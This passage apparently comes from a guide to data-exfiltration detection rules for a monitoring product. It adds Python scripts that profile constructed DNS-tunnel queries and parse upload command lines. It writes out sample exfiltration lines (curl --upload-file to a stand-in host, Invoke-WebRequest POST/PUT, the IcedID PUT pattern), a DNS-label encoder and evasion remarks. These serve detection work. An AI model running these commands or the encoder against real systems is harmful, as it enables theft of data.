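The DNS exfiltration rule above matches one tool's name on the command line. The following Python script is an added example, not part of the demo policy or of Teramind, that looks at the traffic side of the same technique: it generates the kind of query stream the passage describes (data chunks base32-encoded into the leftmost labels under an attacker-controlled apex), mixes them with ordinary lookups in a constructed query log, and flags a (client, apex) pair only when it shows many distinct, long, high-entropy subdomains, so that a single hashed CDN hostname does not trip it. The log format, the apex heuristic (last two labels, no public suffix list), the thresholds and the sample data are assumptions for the example.

```python
from __future__ import annotations
import base64
import math
from collections import Counter, defaultdict

def shannon_entropy(s: str) -> float:
    """Bits per character of the string's own symbol distribution."""
    if not s:
        return 0.0
    counts = Counter(s)
    return -sum(c / len(s) * math.log2(c / len(s)) for c in counts.values())

def split_name(qname: str) -> tuple[str, str]:
    """(subdomain, apex). Simplification: the apex is the last two labels; a production
    version would consult the public suffix list."""
    labels = qname.rstrip(".").lower().split(".")
    if len(labels) <= 2:
        return "", ".".join(labels)
    return ".".join(labels[:-2]), ".".join(labels[-2:])

def profile(log_lines, min_distinct=15, min_mean_entropy=3.0, min_mean_len=25):
    """Aggregate per (client, apex) and flag pairs that look like an encoded channel.
    All three conditions must hold, so one random-looking CDN label is not enough."""
    stats = defaultdict(lambda: {"queries": 0, "subs": set(), "ent": [], "len": []})
    for line in log_lines:
        _ts, client, qname, _qtype = line.split()   # constructed format: "ts client qname qtype"
        sub, apex = split_name(qname)
        s = stats[(client, apex)]
        s["queries"] += 1
        s["subs"].add(sub)
        s["ent"].append(shannon_entropy(sub))
        s["len"].append(len(sub))
    report = {}
    for key, s in stats.items():
        mean_ent = sum(s["ent"]) / len(s["ent"])
        mean_len = sum(s["len"]) / len(s["len"])
        report[key] = {
            "queries": s["queries"], "distinct": len(s["subs"]),
            "mean_entropy": round(mean_ent, 2), "mean_len": round(mean_len, 1),
            "flagged": (len(s["subs"]) >= min_distinct and mean_ent >= min_mean_entropy
                        and mean_len >= min_mean_len),
        }
    return report

# --- constructed sample data (not real traffic) ---
SECRET = (b"Constructed sample document: customer export, card numbers and internal hostnames, "
          b"used only to generate encoded DNS labels for this example. ") * 4

def encode_exfil_queries(data: bytes, apex: str, chunk: int = 30) -> list[str]:
    """Mimic the encoder pattern: base32 each chunk into the leftmost label, add a sequence
    number, and send it under the attacker's apex (30 bytes -> 48 characters, under the 63 limit)."""
    names = []
    for i in range(0, len(data), chunk):
        label = base64.b32encode(data[i:i + chunk]).decode().rstrip("=").lower()
        names.append(f"{label}.{i // chunk}.d.{apex}")
    return names

def build_sample_log() -> list[str]:
    benign = ["www.intranet.example.test", "mail.example.test", "login.example.test",
              "d3a1f9c0b7e2.cdn-vendor.test"]   # last one: a high-entropy label, but one fixed name
    lines = [f"t{i:03d} 10.0.0.5 {benign[i % len(benign)]} A" for i in range(40)]
    lines += [f"t{100 + i:03d} 10.0.0.7 {q} TXT"
              for i, q in enumerate(encode_exfil_queries(SECRET, "c2-updates.test"))]
    return lines

if __name__ == "__main__":
    for (client, apex), r in profile(build_sample_log()).items():
        print(f"{client:10} {apex:22} queries={r['queries']:3} distinct={r['distinct']:3} "
              f"entropy={r['mean_entropy']:.2f} len={r['mean_len']:5.1f} flagged={r['flagged']}")
```

Only the 10.0.0.7 / c2-updates.test pair is flagged: every query carries a different 48-character base32 label. The cdn-vendor.test name has a similarly random-looking label but is queried as one fixed name, which is why the distinct-subdomain count is part of the test. Thresholds need tuning per environment; services that legitimately encode state in hostnames (some CDNs, mail security scanners) are the usual source of false positives.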
T1041 Exfiltration Over C2 Channel
Using PowerShell's Invoke-WebRequest with POST data to send file contents to a remote URL is a simple but effective way to exfiltrate data through the existing C2 channel.
This rule fires when Invoke-WebRequest -Uri with -Method POST -Body arguments, or $filecontent = Get-Content -Path followed by web request commands, are detected. The Warn action fires on detection.
T1052.001 Exfiltration Over Physical Medium: USB
thumb.dd is the container file name used by the USBStealer malware when it stages collected files on removable media, so a file of that name appearing on an external drive is a specific indicator of that tooling.
This rule fires when Access or Write operations targeting thumb.dd on %EXTERNALDRIVES% (excluding drive R:) are detected. The Warn action fires on detection. The R: exclusion is a setting from the demo environment; remove or change it to match whichever drive letters your own approved removable media use.
T1567.002 Exfiltration Over Web Service: ConfigSecurityPolicy
ConfigSecurityPolicy.exe (a Windows Defender binary) can be abused as a Living Off the Land Binary (LOLBin) to exfiltrate data to a remote location while appearing to be legitimate security software activity.
This rule fires when commands locating and executing ConfigSecurityPolicy.exe with a file argument are detected. The Warn action fires on detection. The binary takes the local file to send and the destination URL as its arguments, so the file name in the alert tells you what was uploaded and the URL tells you where.
T1020 Automated Exfiltration: IcedID Botnet HTTP PUT
The IcedID botnet uses HTTP PUT requests to automatically exfiltrate collected data back to its C2 server. This rule detects the specific PowerShell pattern used for this operation.
This rule fires when $contentType = "application/octet-stream" combined with Invoke-WebRequest -Uri $url -Method Put -ContentType $contentType -InFile $fileName is detected in command-line arguments. The Warn action fires immediately. Because the pattern includes the variable names, it detects the documented script verbatim; renaming $url or $fileName is enough to slip past it, so the durable signal is Invoke-WebRequest with -Method Put and -InFile regardless of variable naming.
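The T1048.001 (curl --upload-file / curl -X POST), T1041 (Invoke-WebRequest -Method POST -Body) and T1020 (Invoke-WebRequest -Method Put -InFile) rules above all describe an upload command line matched by literal substring. The following Python script is an added example, not part of the demo policies or of Teramind, that parses those command lines structurally instead: it tokenises the line (unwrapping a powershell -c "..." wrapper and keeping Windows paths intact), walks curl's and Invoke-WebRequest's actual option syntax to recover the HTTP method, the file being sent and the destination host, and compares the host with an allow-list. When the URL is a PowerShell variable it reports the host as unresolved rather than guessing. The allow-list, the sample command lines and the curl option subset handled are assumptions for the example.

```python
from __future__ import annotations
import re
from dataclasses import dataclass
from urllib.parse import urlparse

ALLOWED_UPLOAD_HOSTS = {"artifacts.example.test", "git.example.test"}   # assumption: sanctioned targets
TOOL_RE = re.compile(r"\b(?:curl|invoke-webrequest|invoke-restmethod|iwr|irm)\b", re.I)
TOKEN_RE = re.compile(r'"[^"]*"|\'[^\']*\'|\S+')
CURL_DATA_OPTS = {"-d", "--data", "--data-binary", "--data-raw", "--data-urlencode", "--data-ascii"}
CURL_VALUE_OPTS = {"-H", "--header", "-o", "--output", "-u", "--user", "-A", "--user-agent",
                   "-b", "--cookie", "-x", "--proxy", "-e", "--referer", "-m", "--max-time"}

@dataclass
class Upload:
    tool: str
    method: str
    file: str | None   # path given to the tool, or the PowerShell variable it reads from
    host: str | None   # None when the URL is a variable that cannot be resolved from the command line
    allowed: bool

def tokenize(cmdline: str) -> list[str]:
    """Split on whitespace honouring quotes, keep Windows backslashes, and unwrap
    'powershell -c "..."' / 'cmd /c "..."' wrappers around the real command."""
    out = []
    for m in TOKEN_RE.finditer(cmdline):
        tok = m.group(0)
        if len(tok) >= 2 and tok[0] in "\"'" and tok[-1] == tok[0]:
            tok = tok[1:-1]
            if " " in tok and TOOL_RE.search(tok):
                out.extend(tokenize(tok))
                continue
        out.append(tok.replace('"', "").replace("'", ""))
    return out

def parse_curl(args):
    method = file = url = None
    i = 0
    while i < len(args):
        t, nxt = args[i], (args[i + 1] if i + 1 < len(args) else "")
        if t in ("-T", "--upload-file"):
            method, file, i = method or "PUT", nxt, i + 2
        elif t in CURL_DATA_OPTS:                    # -d @file posts the file as the body
            method, i = method or "POST", i + 2
            file = nxt[1:] if nxt.startswith("@") else file
        elif t in ("-F", "--form"):                   # -F name=@file (or name=<file)
            method, i = method or "POST", i + 2
            m = re.search(r"=[@<](.+)", nxt)
            file = m.group(1) if m else file
        elif t in ("-X", "--request"):
            method, i = nxt.upper(), i + 2
        elif t in CURL_VALUE_OPTS:
            i += 2
        elif t.startswith("-"):
            i += 1
        else:
            url, i = url or t, i + 1
    return method, file, url

def parse_powershell(args):
    method, file, url, body = "GET", None, None, None
    i = 0
    while i < len(args):
        t, nxt = args[i], (args[i + 1] if i + 1 < len(args) else "")
        p = t[1:].lower() if t.startswith("-") and len(t) > 1 and t[1].isalpha() else None
        if p and "uri".startswith(p):                 # PowerShell accepts any unambiguous prefix
            url, i = nxt, i + 2
        elif p and "method".startswith(p):
            method, i = nxt.upper(), i + 2
        elif p and "infile".startswith(p):
            file, i = nxt, i + 2
        elif p and "body".startswith(p):
            body, i = nxt, i + 2
        else:
            i += 1
    if file is None and body and body.startswith("$"):
        file = body                                   # body comes from a variable (e.g. Get-Content)
    return method, file, url

def host_of(url):
    if not url or url.startswith("$"):
        return None
    return urlparse(url if "://" in url else "//" + url).hostname

def find_upload(cmdline: str) -> Upload | None:
    tokens = tokenize(cmdline)
    start = next((i for i, t in enumerate(tokens) if "://" not in t and TOOL_RE.search(t)), None)
    if start is None:
        return None
    tool, args = TOOL_RE.search(tokens[start]).group(0), tokens[start + 1:]
    # In Windows PowerShell 5.1 'curl' is an alias of Invoke-WebRequest: decide by argument style
    ps_style = tool.lower() != "curl" or any(a.lower().startswith(("-uri", "-infile", "-method")) for a in args)
    method, file, url = parse_powershell(args) if ps_style else parse_curl(args)
    if file is None and method not in ("POST", "PUT", "PATCH"):
        return None
    host = host_of(url)
    return Upload(tool, method or "POST", file, host, host in ALLOWED_UPLOAD_HOSTS)

SAMPLE_COMMAND_LINES = [   # constructed process command lines, not real telemetry
    r"curl.exe --upload-file C:\Users\jdoe\export.csv https://files.dropper.test/up",
    r'curl -X POST -F "report=@C:\Users\jdoe\q3.xlsx" https://artifacts.example.test/api/upload',
    r"curl -s https://www.example.test/",
    r'powershell.exe -c "Invoke-WebRequest -Uri https://cdn-upload.test/recv -Method Post -Body $filecontent"',
    r'powershell.exe -c "Invoke-WebRequest -Uri $url -Method Put -ContentType $contentType -InFile $fileName"',
    r"curl -Uri https://cdn-upload.test/recv -Method Post -InFile C:\Users\jdoe\export.csv",
]

if __name__ == "__main__":
    for cmd in SAMPLE_COMMAND_LINES:
        print(find_upload(cmd), "<-", cmd)
```

The fifth sample is the IcedID-style script from the rule above with the literal variable names: the parser still reports a PUT of $fileName to an unresolved host, which is enough to alert on, even though the pattern the page documents would need the exact $contentType line. The sixth shows why the alias check matters: on Windows PowerShell 5.1, curl with -Uri and -InFile is Invoke-WebRequest, not the curl binary, and parsing it as curl would see no upload at all.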